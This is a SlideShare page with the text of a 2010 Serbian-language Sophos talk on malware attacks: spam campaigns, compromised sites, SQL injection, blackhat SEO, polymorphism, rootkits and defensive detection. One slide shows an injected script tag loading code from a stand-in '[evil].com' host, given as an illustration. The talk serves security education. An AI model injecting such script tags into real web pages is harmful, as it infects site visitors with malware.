SlideShare ist ein Scribd-Unternehmen logo
1 von 81
Vanja Svajcer  Principal Researcher – Sophos Beograd, 13 Maj 2010 Anatomijanapada – duhovi u mašini
Šta radi SophosLabs? Sakuplja pretnje Analizira i klasifikuje  Kreira detekcije i otklanja pretnje Objavljuje sveže definicije i informacije Istraživanje i razvoj Nešto više informacija videćemo kasnije 2
SophosLabsu samom centru
Anatomija napada Postavljanje scenarija Zlonamerni softver (Malware) Tehnike napada Proces analize i alati Tehnologija zaštite 4
Tipovi malicioznog softvera Virus Trojanac Crv (Worm) 5
Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje Školarci Srednjoškolci Studenti IT profesionalci Uglavnom muškarci Nikako A/V kompanije Ko se nekada bavio pisanjem virusa?
Virusi se retko viđaju, ali čini se da opet postaju popularni U pitanju je novac U osnovi se svodi na kriminal ( I dalje postoji tamo neki pegavi tinejdžer…) Ko piše malver danas?
APT Advanced Persistent Threat Moderan izraz za “targeted malware” Mala veličina (oko 100k) i posebne namene Nema pakovanja Izgleda kao legitiman Windows fajl Neovlašćeni prikriveni transfer podataka (Data Exfiltration) Težak za uklanjanje 10
11 Email pretnje Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a 2009.taj trend se nastavlja,nekoliko familija se širi agresivnimmasovnim spemovanjem Iste stare taktike socijalnog inženjeringa UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets itd.
12 Top spemovani malver (2009) Dominiraju ključne familijemalvera Bredo Waled Jednostavnoali i dalje radi!
Socijalni inženjering – Bredo Mal/Bredo Ista kampanja može obuhvatati brojne “različite” priloge
Socijalni inženjering – Zbot (aka Zeus) Mal/Zbot
BredovsZbot Konkurencija između botova!!! Bredopokušava da onemogući bilo koji instalirani Zbot Vrlo slično poput NetskyvsBaglerata od pre par godina!!!
16 Email pretnje Globalnespem zamke za praćenje spema SADusmerava više spema nego bilo koja druga pojedinačna država Kompromitovani računari ne samo što šire spem već distribuiraju malver i lansiraju DDoS napade
Web najdominantniji 99% inficiranih sistema su legitimni kompromitovani sajtovi Sajtovi za napad Botnet C&C korišćenjem HTTP Napadi i dalje često počinju spemovanjem email-a 17
18
Napadi Web 2.0 aplikacija
Korak1: preusmeravanje sa kompromitovanog sajta Kompromitovani web sajtovi Attacker-controlledredirects Attack site usingbundle of exploits Payload
Kompromitovanje hostova 21
SQL injection DB DB DB Malicious SQLinjection Hakeri koriste alate da identifikuju stranice potencijalno ranjive na SQL injection Šalju maliciozneHTTP zahteve (Demo)
SQL injection <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http:/ <script src=http://[evil].com/file.js SQL injection uzrokuje da baza podataka postane zabiberena malicioznim skript tagovima Kao rezultat, stranice na web serveru izgrađene od podataka preuzetih iz baze takođe sadrže maliciozne skript tagove
SQL injection Korisnik se kreće web sajtom Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera Žrtva postaje inficirana malverom:Asproxtrojan
25 Demo SQLi + XSS
Novootkrivene inficirane stranice – april 2010 26
Blackhat SEO Kompromitovani hostovi zasejani sa SEO-kitovima Povećavaju rangiranje stranice 27
SEO trovanje Pretraga po popularnim rečima
Blackhat SEO 29
Blackhat SEO 30
31 Demo Blackhat SEO
Vidljivost – sajtovi koji hostuju SEO-kitove
Korak3: Preuzimanje sadržaja sa napadačevog sajta Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristi više kombinovanih ranjivosti Payload
Web napadi Otkriven: 19. oktobra 2009. Izrađen korišćenjem kupljenih kompleta alata MPack, IcePack, GPack,Neosploit, Eleonore, Yes Konzola za upravljanje Phishing Najpogođenije države: Francuska – 4% SAD– 17% Velika Britanija – 3% Nemačka – 6%
Web napadi Pregled po programimaza pregled Internet sadržaja! Polimorfizam sa serverske strane Procenat pogođenih:   MSIE – 12% FireFox – 1%   Opera – 5%
Polimorfizam 36
Polimorfizam 37
Polimorfizam 38
Polimorfizam 39
Polimorfizam 40
Slabosti polimorfnog malvera Poly-engine je deo koda Može biti reverzovan od strane upornog istraživača Mora biti dekriptovan u memoriji Emulira programski kod dok se ne nađe prava varijanta Detekcija može biti bazirana po proceduri dekripcije 41
Polimorfizam sa serverske strane 42
Polimorfizam sa serverske strane 43
Polimorfizam sa serverske strane 44
Polimorfizam sa serverske strane 45
46 Demo SSP
Korak4: Napadni žrtve kroz ranjivosti, zarazi ih Kompromitovani web sajtovi Preusmeravanja kojakontroliše napadač Sajt za napad koristiviše kombinovanih ranjivosti Tovar
Lažni AV profesionalizam
49 Video - scareware
Troj/MacSwp 50 
Zeus (Zbot) Komplet za kreiranje botneta i malvera za krađu informacija Builder Loader Control panel 51
52 Demo Zbot
Zeus (Zbot) - tracker 53
54 Rootkitovi Programi koji koriste različite tehnike da sakriju svoje prisustvo na računaru Trojanci Legitimni programi?
Šta Rootkitovi rade? Listanjefajlova Memo.doc Memo.doc Sales.xls Sales.xls Phish.exe Sophos.ppt Listanjefajlova Anti-Virus skener Rootkit Operativni sistem Phish.exe Sophos.ppt
56 Demo rootkit
57 Vrhunski rootkitovi TDSS (TDL3)  MS10-015 update
Vrhunski rootkitovi– Sinowal (Mebroot) InficiraMBR (poput starih boot sektor virusa) ModifikujeOS loader da učita maliciozni drajver Drajver sakriva maliciozniMBR (stealth) Instalira prilagođenimrežni stek Sadržibackdoor (enkriptovanaHTTP komunikacija) Tovar– ubrizgava maliciozne DLL-ove Pseudo-nasumično generisanje URL-ova zaupdate (dnevni)
Rootkitovi– Sinowal (Mebroot)	 CPU Real mode CPU Protected mode BIOS initialization MBR Boot loader Early kernel initialization Kernel initialization MBR Boot loader Early kernel initialization User process Endpoint security User process Sinowal dropper User process Read  MBR BIOS services Window services Window services Hard disk
Sinowal geografsko širenje(Sinowal, Feb-Mar 2010)
61 Vrhunski rootkitovi budućnosti Rootkitovi za virtualizaciju Softver(Subvirt) Uz pomoć hardvera (Bluepill, Vitriol) Bootkitovi (eEye, vBootkit, Stoned) SMM bazirani rootkitovi Bios/EFI bazirani rootkitovi?
Rootkitovi za virtualizaciju Aplikacija 1 OSg1 OSg2 Aplikacija 2 VMM Rootkit za virtualizaciju OS Hardver
Rootkitovi za virtualizaciju OSg3 OSg2 OSg1 Domen 0 Hardver Rootkit za virtualizaciju – maliciozni  hipervizor
SophosLabs™
Pregled 65 50000
SophosLabssistemi
67 Demo lab sistemi
Tehnologija zaštite Inspekcija sadržaja (klasično skeniranje) Detekcija na bazi ponašanja (HIPS) Reputacija Domen Fajl 68
Životni ciklus familije malvera Prvi član porodice Analiza Detekcija TEST Objava Sledeći član porodica
Karakteristike familije Identične osnovne funkcionalnosti Nove varijante mogu imati dodatne funkcionalnosti Linije koda se ponovo upotrebljavaju Nakon rekompilacije, nova varijanta je binarno različita Tradicionalno skeniranje nije efikasno za proaktivnu detekciju familije Zahteva analizu na funkcionalnom nivou
Grafički prikaz aplikativnih zahteva
Spakovan -> Raspakovan
„Runtime behavioral“zaštita Nadopunjuje Behavioral Genotype Proverava ponašanje procesa primenjenona sistemu Proverava sve pokrenute procese na znake malicioznih modifikacija sistemskih objekata Fajlove Registry unose Procese Mrežne konekcije Učitane drajvere
Registracija urun ključu ,[object Object]
Hmmm, OK.Skeniram na viruse…
Ništa nije pronađeno.
Virus.exe otvararegistry run ključ...
Zanimljivo. Reci mi nešto više o tome.
Virus.exe se registruje u run ključ…
Hmmm, ne, to nije OK.Blokiraj operaciju!!!
Operacija blokirana.

Weitere ähnliche Inhalte

Ähnlich wie Anatomija napada – duhovi u mašini

Безбедност и ризици: Малициозни програми
Безбедност и ризици: Малициозни програмиБезбедност и ризици: Малициозни програми
Безбедност и ризици: Малициозни програмиОШ ХРШ
 
Paukovic i-racunalni-virusi
Paukovic i-racunalni-virusiPaukovic i-racunalni-virusi
Paukovic i-racunalni-virusizbornica
 
Informatika.netkp (antivirusi i virusi)
Informatika.netkp (antivirusi i virusi)Informatika.netkp (antivirusi i virusi)
Informatika.netkp (antivirusi i virusi)Andrej177
 
ЗАШТИТА НА ИНТЕРНЕТУ
ЗАШТИТА НА ИНТЕРНЕТУЗАШТИТА НА ИНТЕРНЕТУ
ЗАШТИТА НА ИНТЕРНЕТУNatasaStojkovic11
 
Zlonamerni programi
Zlonamerni programiZlonamerni programi
Zlonamerni programiarmbor
 
Napadi na VPVA - zoss
Napadi na VPVA -  zossNapadi na VPVA -  zoss
Napadi na VPVA - zossTeam61
 
Antivirusi Isidora Ivanovic
Antivirusi Isidora IvanovicAntivirusi Isidora Ivanovic
Antivirusi Isidora IvanovicDejan Pejčić
 
Zastita i sigurnost elektronskog poslovanja 2
Zastita i sigurnost elektronskog poslovanja 2Zastita i sigurnost elektronskog poslovanja 2
Zastita i sigurnost elektronskog poslovanja 2Ivan Rabrenovic
 
zastita i sigurnos elektronskog poslovanja 1
 zastita i sigurnos elektronskog poslovanja 1  zastita i sigurnos elektronskog poslovanja 1
zastita i sigurnos elektronskog poslovanja 1 Ivan Rabrenovic
 
Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPress
 Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPress Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPress
Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPressDamir Bodor
 
Evolucija cyber pretnji i razvoj cyber
Evolucija cyber pretnji i razvoj cyberEvolucija cyber pretnji i razvoj cyber
Evolucija cyber pretnji i razvoj cyberDejan Jeremic
 
Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111
Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111
Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111guest33125
 
Zastita od softverskog napada
Zastita od softverskog napadaZastita od softverskog napada
Zastita od softverskog napadaivica_seminarski
 
Seminarski rad antivirusi
Seminarski rad antivirusiSeminarski rad antivirusi
Seminarski rad antivirusistevadobrota
 
Napredne tehnike razvoja web aplikacija - Zend Framework
Napredne tehnike razvoja web aplikacija - Zend FrameworkNapredne tehnike razvoja web aplikacija - Zend Framework
Napredne tehnike razvoja web aplikacija - Zend FrameworkSaša Stamenković
 

Ähnlich wie Anatomija napada – duhovi u mašini (20)

Безбедност и ризици: Малициозни програми
Безбедност и ризици: Малициозни програмиБезбедност и ризици: Малициозни програми
Безбедност и ризици: Малициозни програми
 
Paukovic i-racunalni-virusi
Paukovic i-racunalni-virusiPaukovic i-racunalni-virusi
Paukovic i-racunalni-virusi
 
Informatika.netkp (antivirusi i virusi)
Informatika.netkp (antivirusi i virusi)Informatika.netkp (antivirusi i virusi)
Informatika.netkp (antivirusi i virusi)
 
USB napadi
USB napadiUSB napadi
USB napadi
 
ЗАШТИТА НА ИНТЕРНЕТУ
ЗАШТИТА НА ИНТЕРНЕТУЗАШТИТА НА ИНТЕРНЕТУ
ЗАШТИТА НА ИНТЕРНЕТУ
 
Maliciozni softver
Maliciozni softverMaliciozni softver
Maliciozni softver
 
Zlonamerni programi
Zlonamerni programiZlonamerni programi
Zlonamerni programi
 
Napadi na VPVA - zoss
Napadi na VPVA -  zossNapadi na VPVA -  zoss
Napadi na VPVA - zoss
 
Antivirusi Isidora Ivanovic
Antivirusi Isidora IvanovicAntivirusi Isidora Ivanovic
Antivirusi Isidora Ivanovic
 
Zastita i sigurnost elektronskog poslovanja 2
Zastita i sigurnost elektronskog poslovanja 2Zastita i sigurnost elektronskog poslovanja 2
Zastita i sigurnost elektronskog poslovanja 2
 
zastita i sigurnos elektronskog poslovanja 1
 zastita i sigurnos elektronskog poslovanja 1  zastita i sigurnos elektronskog poslovanja 1
zastita i sigurnos elektronskog poslovanja 1
 
Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPress
 Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPress Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPress
Nikola Petrov-Bezbednost WordPress sajtova - Uvod u WordPress
 
Evolucija cyber pretnji i razvoj cyber
Evolucija cyber pretnji i razvoj cyberEvolucija cyber pretnji i razvoj cyber
Evolucija cyber pretnji i razvoj cyber
 
Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111
Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111
Racunarska bezbednost i rizici računarska forenzička analiza (autosaved)1111
 
Zastita od softverskog napada
Zastita od softverskog napadaZastita od softverskog napada
Zastita od softverskog napada
 
Seminarski rad antivirusi
Seminarski rad antivirusiSeminarski rad antivirusi
Seminarski rad antivirusi
 
Virusi
VirusiVirusi
Virusi
 
Virusi 1
Virusi 1Virusi 1
Virusi 1
 
Napredne tehnike razvoja web aplikacija - Zend Framework
Napredne tehnike razvoja web aplikacija - Zend FrameworkNapredne tehnike razvoja web aplikacija - Zend Framework
Napredne tehnike razvoja web aplikacija - Zend Framework
 
Arhimedes2015-VelimirRadlovacki
Arhimedes2015-VelimirRadlovackiArhimedes2015-VelimirRadlovacki
Arhimedes2015-VelimirRadlovacki
 

Mehr von ITDogadjaji.com

Supporting clusters in Serbia
Supporting clusters in SerbiaSupporting clusters in Serbia
Supporting clusters in SerbiaITDogadjaji.com
 
Outsourcing Center Serbia
Outsourcing Center SerbiaOutsourcing Center Serbia
Outsourcing Center SerbiaITDogadjaji.com
 
Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...
Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...
Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...ITDogadjaji.com
 
How to Web 2011 Event Presentation
How to Web 2011 Event PresentationHow to Web 2011 Event Presentation
How to Web 2011 Event PresentationITDogadjaji.com
 
Panel intro: The European Startup: Opportunities
Panel intro: The European Startup: Opportunities Panel intro: The European Startup: Opportunities
Panel intro: The European Startup: Opportunities ITDogadjaji.com
 
ShoutEm - It's alright to pivot
ShoutEm - It's alright to pivotShoutEm - It's alright to pivot
ShoutEm - It's alright to pivotITDogadjaji.com
 
How to deal with the media without screwing up
How to deal with the media without screwing upHow to deal with the media without screwing up
How to deal with the media without screwing upITDogadjaji.com
 
VC 101: getting to first base
VC 101: getting to first baseVC 101: getting to first base
VC 101: getting to first baseITDogadjaji.com
 
From Ljubljana into the world
From Ljubljana into the worldFrom Ljubljana into the world
From Ljubljana into the worldITDogadjaji.com
 
Engineering challenges in vertical search engines
Engineering challenges in vertical search enginesEngineering challenges in vertical search engines
Engineering challenges in vertical search enginesITDogadjaji.com
 
How to Web 2010 - Event presentation
How to Web 2010 - Event presentationHow to Web 2010 - Event presentation
How to Web 2010 - Event presentationITDogadjaji.com
 

Mehr von ITDogadjaji.com (20)

Game Design 101
Game Design 101Game Design 101
Game Design 101
 
Uvod u Gejmifikaciju
Uvod u GejmifikacijuUvod u Gejmifikaciju
Uvod u Gejmifikaciju
 
Supporting clusters in Serbia
Supporting clusters in SerbiaSupporting clusters in Serbia
Supporting clusters in Serbia
 
Outsourcing Center Serbia
Outsourcing Center SerbiaOutsourcing Center Serbia
Outsourcing Center Serbia
 
ICT Clusters
ICT ClustersICT Clusters
ICT Clusters
 
Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...
Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...
Trends in Software Development: from Outsourcing to Crowdsourcing and Collabo...
 
How to Web 2011 Event Presentation
How to Web 2011 Event PresentationHow to Web 2011 Event Presentation
How to Web 2011 Event Presentation
 
Panel intro: The European Startup: Opportunities
Panel intro: The European Startup: Opportunities Panel intro: The European Startup: Opportunities
Panel intro: The European Startup: Opportunities
 
Mobipatrol
MobipatrolMobipatrol
Mobipatrol
 
Mediatoolkit
MediatoolkitMediatoolkit
Mediatoolkit
 
Taksiko
TaksikoTaksiko
Taksiko
 
SiteCake
SiteCakeSiteCake
SiteCake
 
ShoutEm - It's alright to pivot
ShoutEm - It's alright to pivotShoutEm - It's alright to pivot
ShoutEm - It's alright to pivot
 
How to (Win on the) Web
How to (Win on the) WebHow to (Win on the) Web
How to (Win on the) Web
 
How to deal with the media without screwing up
How to deal with the media without screwing upHow to deal with the media without screwing up
How to deal with the media without screwing up
 
VC 101: getting to first base
VC 101: getting to first baseVC 101: getting to first base
VC 101: getting to first base
 
birthdaysRock.com
birthdaysRock.combirthdaysRock.com
birthdaysRock.com
 
From Ljubljana into the world
From Ljubljana into the worldFrom Ljubljana into the world
From Ljubljana into the world
 
Engineering challenges in vertical search engines
Engineering challenges in vertical search enginesEngineering challenges in vertical search engines
Engineering challenges in vertical search engines
 
How to Web 2010 - Event presentation
How to Web 2010 - Event presentationHow to Web 2010 - Event presentation
How to Web 2010 - Event presentation
 

Anatomija napada – duhovi u mašini